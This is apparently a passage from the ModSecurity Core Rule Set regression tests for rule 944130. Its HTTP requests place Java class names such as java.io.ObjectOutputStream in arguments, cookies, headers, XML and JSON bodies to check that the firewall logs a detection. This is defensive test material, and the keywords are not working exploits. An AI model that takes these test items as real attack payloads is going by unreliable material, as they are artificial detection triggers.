"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - test: java.io.InputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-148 - desc: "XML attribute value includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-149 - desc: "XML element value includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-150 - desc: "Nested XML element value includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id 
\"944130\"" - - - - test_title: 944130-151 - desc: "Content-Type text/plain includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-152 - desc: "Content-Type application/json arg value includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-153 - desc: "Content-Type application/json arg name includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.InputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-154 - desc: "Argument test includes 
keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-155 - desc: "Argument name includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStreamReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-156 - desc: "Cookie test includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStreamReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-157 - desc: "Cookie name includes keyword java.io.InputStreamReader" - stages: - - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStreamReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-158 - desc: "Request header test includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStreamReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-159 - desc: "XML attribute value includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-160 - desc: "XML element value includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 
- headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-161 - desc: "Nested XML element value includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-162 - desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-163 - desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStreamReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-164 - desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.InputStreamReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-165 - desc: "Argument test includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-166 - desc: "Argument name includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.LineNumberReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-167 - desc: "Cookie test includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.LineNumberReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-168 - desc: "Cookie name includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.LineNumberReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-169 - desc: "Request header test includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.LineNumberReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-170 - desc: "XML attribute value includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-171 - desc: "XML element value includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-172 - desc: "Nested XML element value includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-173 - desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-174 - desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.LineNumberReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-175 - desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.LineNumberReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-176 - desc: "Argument test includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-177 - desc: "Argument name includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-178 - desc: "Cookie test includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ObjectOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-179 - desc: "Cookie name includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ObjectOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-180 - desc: "Request header test includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ObjectOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-181 - desc: "XML attribute value includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-182 - desc: "XML element value includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-183 - desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-184 - desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-185 - desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ObjectOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-186 - desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.ObjectOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-187 - desc: "Argument test includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-188 - desc: "Argument name includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.OutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-189 - desc: "Cookie test includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.OutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-190 - desc: "Cookie name includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.OutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-191 - desc: "Request header test includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.OutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-192 - desc: "XML attribute value includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - 